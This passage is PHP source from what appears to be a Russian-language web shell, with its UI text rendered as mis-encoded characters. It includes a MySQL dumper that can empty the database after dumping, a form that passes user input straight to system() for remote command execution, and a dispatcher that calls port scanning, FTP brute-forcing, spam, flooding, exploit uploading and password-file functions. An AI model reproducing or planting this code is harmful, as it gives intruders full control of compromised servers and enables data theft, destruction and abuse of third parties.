if ($fcut && ((file_pos()+$sz_t) > $max_sql)) {
|
|
$p_csv=split_sql_file($temp);
|
|
while(list($j,$val)=each($p_csv)) {
|
|
if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val."\n"); }
|
|
else {
|
|
close_file();
|
|
$nbf++;
|
|
open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
|
|
write_file($val."\n");
|
|
}
|
|
}
|
|
} else { write_file($temp); }
|
|
$tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
|
|
}
|
|
}
|
|
}
|
|
|
|
mysql_close();
|
|
if (!$ftbl) { close_file(); }
|
|
|
|
echo $header;
|
|
echo "<br><center>Âñå äàííûå â ýòèõ òàáëèöàõ:<br> ".$tblsv." ïîìåùåíû â ôàéë óêàçàííûé íèæå:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Ôàéë</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Ðàçìåð</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
|
|
reset($f_nm);
|
|
while (list($i,$val)=each($f_nm)) {
|
|
$coul='#99CCCC';
|
|
if ($i % 2) { $coul='#CFE3E3'; }
|
|
echo "<tr><td></td><td bgcolor=".$coul." class=texte> <a href='".$val."' class=link target='_blank'>".$val." </a></td><td></td>";
|
|
$fz_tmp=filesize($val);
|
|
if ($fcut && ($fz_tmp > $max_sql)) {
|
|
echo "<td bgcolor=".$coul." class=texte> <font size=1 color=red>".$fz_tmp." Octets</font> </td><td></td></tr>";
|
|
} else {
|
|
echo "<td bgcolor=".$coul." class=texte> <font size=1>".$fz_tmp." áàéò</font> </td><td></td></tr>";
|
|
}
|
|
echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
|
|
}
|
|
echo "</table><br>";
|
|
echo $footer;exit;
|
|
}
|
|
|
|
if ($sqlaction=='connect') {
|
|
if(!@mysql_connect($dbhost,$dbuser,$dbpass)) {
|
|
echo $header."<br><center><font color=red><b>Ïîäêëþ÷åíèå íå âîçìîæíî! Ïðîâåðüòå ïðàâèëüíî ëè ââåäåíû äàííûå!</b></font></center>\n$footer";
|
|
exit;
|
|
}
|
|
|
|
if(!@mysql_select_db($dbbase)) {
|
|
echo $header."<br><center><font color=red><<b>Ïîäêëþ÷åíèå íå âîçìîæíî! Ïðîâåðüòå ïðàâåëüíî ëè ââåäèíû äàííûå!</b></font></center>\n$footer";
|
|
exit;
|
|
}
|
|
|
|
if ($secu==1) {
|
|
if (!file_exists($secu_config)) {
|
|
$fp=fopen($secu_config,"w");
|
|
fputs($fp,"<?php\n");
|
|
fputs($fp,"\$dbhost='$dbhost';\n");
|
|
fputs($fp,"\$dbbase='$dbbase';\n");
|
|
fputs($fp,"\$dbuser='$dbuser';\n");
|
|
fputs($fp,"\$dbpass='$dbpass';\n");
|
|
fputs($fp,"?>");
|
|
fclose($fp);
|
|
}
|
|
include($secu_config);
|
|
} else {
|
|
if (file_exists($secu_config)) { unlink($secu_config); }
|
|
}
|
|
|
|
mysql_connect($dbhost,$dbuser,$dbpass);
|
|
$tables=mysql_list_tables($dbbase);
|
|
$nb_tbl=mysql_num_rows($tables);
|
|
|
|
echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Âûáèðèòå íóæíûå âàì òàáëèöû äëÿ äàìïèíãà!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Âûäåëèòü âñ¸' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Íàçâàíèÿ òàáëèö</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
|
|
|
|
$i=0;
|
|
while ($i < mysql_num_rows ($tables)) {
|
|
$coul='#99CCCC';
|
|
if ($i % 2) { $coul='#CFE3E3';}
|
|
$tb_nom=mysql_tablename ($tables,$i);
|
|
echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'> ".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
|
|
$i++;
|
|
}
|
|
|
|
mysql_close();
|
|
echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'>
|
|
Ñîõðàíèòü â ôîðìàòå csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked>
|
|
Ñîõðàíèòü â ôîðìàòå Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
|
|
Ñîõðàíèòü ñòðóêòóðó è äàííûå<br> <input type='radio' name='opt' value='2'>
|
|
Ñîõðàíèòü òîëüêî ñòðóêòóðó<br> <input type='radio' name='opt' value='3'>
|
|
Ñîõðàíèòü òîëüêî äàííûå<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
|
|
Ïåðåçàïèñûâàòü ôàéë, åñëè ñóùåñòâóåò<br> <input type='Checkbox' name='ecraz' value='1' checked>
|
|
Î÷èñòèòü áàçó ïîñëå ñîçäàíèÿ äàìïà<br> <input type='Checkbox' name='f_tbl' value='1'>
|
|
Ïîìåùàòü êàæäóþ òàáëèöó â îòäåëüíûé ôàéë<br> <input type='Checkbox' name='f_cut' value='1'>
|
|
Ìàêñèìàëüíûé ðàçìåð îäíîãî äàìï-ôàéëà: <input type='text' name='max_sql' value='200000' class=form>
|
|
Octets<br> <input type='Checkbox' name='file_type' value='1'>
|
|
Gzip.<br>
|
|
</td></tr></table><br><br><input type='submit' value=' Çàäàìïèòü:) ' class=form></form></center>$footer";
|
|
exit;
|
|
}
|
|
|
|
// SQL actions END
|
|
|
|
if(file_exists($secu_config)) {
|
|
include ($secu_config);
|
|
$ck="checked";
|
|
} else {
|
|
$dbhost="localhost";
|
|
$dbbase="";
|
|
$dbuser="root";
|
|
$dbpass="";
|
|
$ck="";
|
|
}
|
|
|
|
echo $header."
|
|
<table width=620 cellpadding=0 cellspacing=0 align=center>
|
|
<col width=1>
|
|
<col width=600>
|
|
<col width=1>
|
|
<tr>
|
|
<td></td>
|
|
<td align=left class=texte>
|
|
<br>
|
|
<form action='' method='post'>
|
|
<input type='hidden' name='sqlaction' value='connect'>
|
|
<table border=0 align=center>
|
|
<col>
|
|
<col align=left>
|
|
<tr>
|
|
<td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Ââåäèòå äàííûå äëÿ ïîäêëþ÷åíèþ ê mySQL ñåðâåðó!<br><br></td>
|
|
</tr>
|
|
<tr>
|
|
<td class=texte>Àäðåñ ñåðâåðà:</td>
|
|
<td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
|
|
</tr>
|
|
<tr>
|
|
<td class=texte>Íàçâàíèå áàçû:</td>
|
|
<td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
|
|
</tr>
|
|
<tr>
|
|
<td class=texte>Ëîãèí:</td>
|
|
<td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
|
|
</tr>
|
|
<tr>
|
|
<td class=texte>Ïàðîëü</td>
|
|
<td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
|
|
</tr>
|
|
</table>
|
|
<br> <center> <br><br>
|
|
<input type='submit' value=' Ïîäêëþ÷èòñÿ ' class=form></center> </form> <br><br>
|
|
</td>
|
|
<td></td>
|
|
</tr>
|
|
<tr>
|
|
<td height=1 colspan=3></td>
|
|
</tr>
|
|
</table>
|
|
</center>";
|
|
|
|
}
|
|
// SQL END
|
|
|
|
/* main() */
|
|
set_time_limit(0);
|
|
|
|
if ( $action !="download") print("$HTML");
|
|
|
|
if (!isset($cm)) {
|
|
if (!isset($action)) {
|
|
if (!isset($tm)) { $tm = getcwd(); }
|
|
$curdir = getcwd();
|
|
if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Íåò äîñòóïà ê äåðèêòîðèè, ñìîòðè CHMOD.</td></tr></table>");
|
|
getdir();
|
|
chdir($curdir);
|
|
$supsub = $gdir[$j-1];
|
|
if (!isset($tm) ) { $tm=getcwd();}
|
|
readdirdata($tm);
|
|
} else {
|
|
switch ($action) {
|
|
case "view":
|
|
viewfile($tm,$fi);
|
|
break;
|
|
case "delete":
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ôàéë <b>$fi</b> óñïåøíî óäàëåí.</font></center></td></tr></table>";
|
|
deletef($tm);
|
|
break;
|
|
case "download":
|
|
if (isset($fatt) && strlen($fatt)>0) {
|
|
$attach=$fatt;
|
|
header("Content-type: text/plain");
|
|
}
|
|
else {
|
|
$attach=$fi;
|
|
header("Content-type: hackru");
|
|
}
|
|
header("Content-disposition: attachment; filename=\"$attach\";");
|
|
readfile($tm."/".$fi);
|
|
break;
|
|
case "download_mail":
|
|
download_mail($tm,$fi);
|
|
break;
|
|
case "edit":
|
|
editfile($tm,$fi);
|
|
break;
|
|
case "save":
|
|
savefile($tm,$fi);
|
|
break;
|
|
case "uploadd":
|
|
uploadtem();
|
|
break;
|
|
case "up":
|
|
up($tm);
|
|
break;
|
|
case "newdir":
|
|
newdir($tm);
|
|
break;
|
|
case "createdir":
|
|
cdir($tm);
|
|
break;
|
|
case "deldir":
|
|
deldir();
|
|
break;
|
|
case "feedback":
|
|
mailsystem();
|
|
break;
|
|
case "upload":
|
|
upload();
|
|
break;
|
|
case "help":
|
|
help();
|
|
break;
|
|
case "ftp":
|
|
ftp();
|
|
break;
|
|
case "portscan":
|
|
portscan();
|
|
break;
|
|
case "sql":
|
|
sql();
|
|
break;
|
|
case "tar":
|
|
tar();
|
|
break;
|
|
case "bash":
|
|
bash();
|
|
break;
|
|
case "passwd":
|
|
passwd();
|
|
break;
|
|
case "exploits":
|
|
exploits($dir);
|
|
break;
|
|
case "upload_exploits":
|
|
upload_exploits($dir);
|
|
break;
|
|
case "upload_exploitsp":
|
|
upload_exploitsp($dir);
|
|
break;
|
|
case "arhiv":
|
|
arhiv($tm,$pass);
|
|
break;
|
|
case "crypte":
|
|
crypte();
|
|
break;
|
|
case "decrypte":
|
|
decrypte();
|
|
break;
|
|
case "brut_ftp":
|
|
brut_ftp();
|
|
break;
|
|
case "copyfile":
|
|
copyfile($tm,$fi);
|
|
break;
|
|
case "down":
|
|
down($dir);
|
|
break;
|
|
case "downfiles":
|
|
downfiles($dir);
|
|
break;
|
|
case "spam":
|
|
spam();
|
|
break;
|
|
case "flud":
|
|
flud();
|
|
break;
|
|
case "spam1":
|
|
spam1($file);
|
|
break;
|
|
case "del":
|
|
del();
|
|
break;
|
|
}
|
|
}
|
|
} else {
|
|
echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Âûïîëåíî: $cm</center><pre>";
|
|
echo system($cm);
|
|
echo "</pre></td></tr></table>";
|
|
}
|
|
|
|
if ($action !="download" && $action != "flud" && $action != "down" && $action != "del" && $action != "spam1" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd" && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Êîìàíäíàÿ ñòðîêà:</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='Äàâè' class=button1 $style_button></td></tr></form></table>";
|
|
$perdir = @permissions(fileperms($tm));
|
|
if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
|
|
else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Íå ìîãó çàãðóæàòü ôàéëû â ýòîé äåðèêòîðèè</b></font></td></tr></table>";
|
|
if ($perdir[7] == "w" && isset($tm)) {
|
|
echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Ñîçäàòü êàòàëîã:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Äàâè' class=button1 $style_button></td></tr></form></table>";
|
|
} else {
|
|
echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Íå ìîãó ñîçäàòü ïàïêó â ýòîé äåðèêòîðèè</b></td></tr></table>";
|
|
}
|
|
}
|
|
|
|
if ($action !="download" && $action != "flud" && $action != "down" && $action != "del" && $action != "spam" && $action != "spam1" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd" && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
|
|
echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ãîòîâûå çàïðîñû ê Unix ñåðâåðó:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
|
|
foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
|
|
echo "</select></td><td valign=top align=right width=5%><input type=submit value='Äàâè' class=button1 $style_button></td></tr></table></form>";
|
|
}
|
|
|
|
if ( $action !="download") echo nfm_copyright();
|
|
?>
|